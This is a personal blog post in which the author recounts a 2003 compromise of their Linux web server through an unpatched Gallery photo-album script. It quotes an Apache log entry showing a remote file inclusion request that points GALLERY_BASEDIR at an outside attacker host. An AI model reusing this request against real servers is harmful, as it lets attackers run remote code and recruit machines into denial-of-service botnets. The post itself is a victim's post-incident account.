*growling noises*
My linux box was hacked, allowing whoever did it to run some perl script (vb.pl) which ate all of my CPU and bandwidth (undoubtedly for some nefarious purpose) until I noticed. Fuckers. Happily, the process was running as www-data, so I’m probably not rooted. My apache installation, I admit, was not as secure as it could have been. Really rather annoying. So, my photos, which were served from that box, will be down until further notice, since the easiest thing to do is to just not run apache at all, and put them on a real server someplace when I get a chance.
UPDATE, 31 May 2003: I finally got around to looking through my Apache logs from the attack:
200.51.40.34 – - [28/May/2003:02:22:24 -0500] “GET /errors/configmode.php?GALLERY_BASEDIR=http://ddos.front.ru/ HTTP/1.0″ 200 289 “-” “Mozilla 5.0 [en-US]“
It looks pretty certain that a security hole in the photo album script I use, Gallery, was exploited to turn my box into a drone in a distributed denial-of-service attack. Yup, I failed to install a released security patch and got bitten in the ass. Two geek demerit points.
Incidentally, the host that contacted me is itself a cracked box, indicating that it was “hacked by redmax” and sporting this lovely message.
Fuckers.
1 Comment
RSS feed for comments on this post.
Sorry, the comment form is closed at this time.
Linkblog Atom Feed
Someone got me with the same exploit. See the link. At least you won’t feel alone – hundreds of others were screwed, too.
Comment by Josh Woodward — June 6, 2003 @ 11:21 am